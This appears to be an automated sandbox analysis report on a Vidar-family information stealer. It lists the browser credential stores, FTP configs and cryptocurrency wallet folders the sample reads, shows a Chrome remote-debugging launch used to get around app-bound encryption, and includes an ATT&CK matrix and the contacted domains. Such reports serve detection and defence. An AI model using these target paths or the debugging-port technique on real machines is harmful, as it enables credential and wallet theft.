Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B18FE6B0 WSASocketW,ioctlsocket,setsockopt,GetLastError,setsockopt,WSAIoctl,GetLastError,bind,GetLastError,bind,bind,GetLastError,closesocket,setsockopt,GetLastError,setsockopt,GetLastError,setsockopt,GetLastError,

0_2_00007FF6B18FE6B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Process Injection	1 Obfuscated Files or Information	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	121 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	3 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
xoJxSAotVM.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\ProgramData\GDT0R9H4EU37\HLNYCB	0%	ReversingLabs
C:\ProgramData\din.exe	38%	ReversingLabs
C:\Users\user\AppData\Local\Temp\112974\Decade.com	3%	ReversingLabs

Name	IP	Active	Malicious	Reputation
stadyready.su	5.101.153.57	true	false	unknown
t.me	149.154.167.99	true	false	high
www.google.com	142.250.181.68	true	false	high
kresk.lol	159.69.102.165	true	true	unknown
iHFuwBwsuPMSXCezcESiLqwrfPI.iHFuwBwsuPMSXCezcESiLqwrfPI	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp, J5PP8Q.16.dr	false	high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	J5PP8Q.16.dr	false	high
https://docs.google.com/document/J	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4633	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7382	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	JWBIEC.16.dr	false	high
https://issuetracker.google.com/284462263	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000015.00000003.2475233569.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474589487.0000377800F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474071772.0000377800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475485638.0000377800F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474388287.000037780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474700421.0000377801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475346645.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475306740.0000377800A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474451664.000037780105C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/document/:	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/Prod.C:	edb.log.22.dr	false	high
https://anglebug.com/7714	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/7o	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/?lfhs=2	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6248	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6929	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5281	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000016.00000003.2452424693.0000014B372C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	false	high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	JWBIEC.16.dr	false	high
https://issuetracker.google.com/255411748	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/J	Decade.com, 00000010.00000000.1770344241.0000000000DD9000.00000002.00000001.01000000.00000008.sdmp, Decade.com.7.dr, Beverly.6.dr	false	high
https://anglebug.com/7246	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7369	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7489	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/?q=	chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000015.00000003.2475233569.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474589487.0000377800F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474071772.0000377800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475485638.0000377800F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474388287.000037780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474700421.0000377801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475346645.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475306740.0000377800A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2474451664.000037780105C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	J5PP8Q.16.dr	false	high
http://crl.ver)	svchost.exe, 00000016.00000002.2923922505.0000014B37084000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	JWBIEC.16.dr	false	high
https://issuetracker.google.com/161903006	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	J5PP8Q.16.dr	false	high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3078	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7553	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5375	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/)m	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/Jn	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5371	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4722	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000015.00000003.2451571598.00003778001D0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7556	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-preprod.corp.google.com/	chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	GVAAAA.16.dr	false	high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6692	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/258207403	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3502	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3623	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3625	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3624	chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/presentation/J	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/4o	chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5007	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3862	chrome.exe, 00000015.00000003.2467389058.000037780037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467749156.0000377800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000015.00000003.2484675069.0000377800CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471383023.0000377800CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471890760.0000377800CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471011491.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2468222441.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476039230.0000377800CBC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/callout?prid=19044659	chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	false	high
